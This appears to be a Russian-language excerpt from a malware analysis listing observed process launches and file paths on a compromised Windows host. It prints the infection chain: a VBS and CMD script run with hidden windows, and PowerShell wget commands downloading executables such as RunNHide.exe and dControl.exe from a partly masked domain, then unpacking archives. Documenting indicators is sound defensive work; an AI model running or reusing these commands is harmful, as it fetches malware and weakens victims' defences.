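Техническая информация
Ниже перечислены запуски процессов (строки, начинающиеся с '<SYSTEM32>\…') и пути к файлам в каталоге C:\Microsoft (строки без имени исполняемого файла). Домен в URL, по-видимому, частично замаскирован символами ##. Два файла, загружаемые с расширением .oui, сохраняются на диск как .exe; wget в этих командах — псевдоним Invoke-WebRequest в Windows PowerShell.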
- '<SYSTEM32>\wscript.exe' "C:\Microsoft\rewop.vbs"
- C:\microsoft\rewop.cmd
- C:\microsoft\rewop.vbs
- '<SYSTEM32>\cmd.exe' /c start /b C:\Microsoft\rewop.cmd' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /b C:\Microsoft\rewop.cmd
- '<SYSTEM32>\cmd.exe' /K C:\Microsoft\rewop.cmd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFhgIAPI1Nh_RunNHide.oui" -outfile "C:\Microsoft\RunNHide.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFhgGnVnrCh_dControl.oui" -outfile "C:\Microsoft\dcontrol.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFioWkUnsM3_protect.cmd" -outfile "C:\Microsoft\protect.cmd"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFipDLoQbu3_update2.zip" -outfile "C:\Microsoft\update2.zip"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Expand-Archive C:\Microsoft\update2.zip -DestinationPath C:\Microsoft"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Expand-Archive C:\PerfLogs\Microsoft.zip -DestinationPath C:\Microsoft"
- '<SYSTEM32>\timeout.exe' 5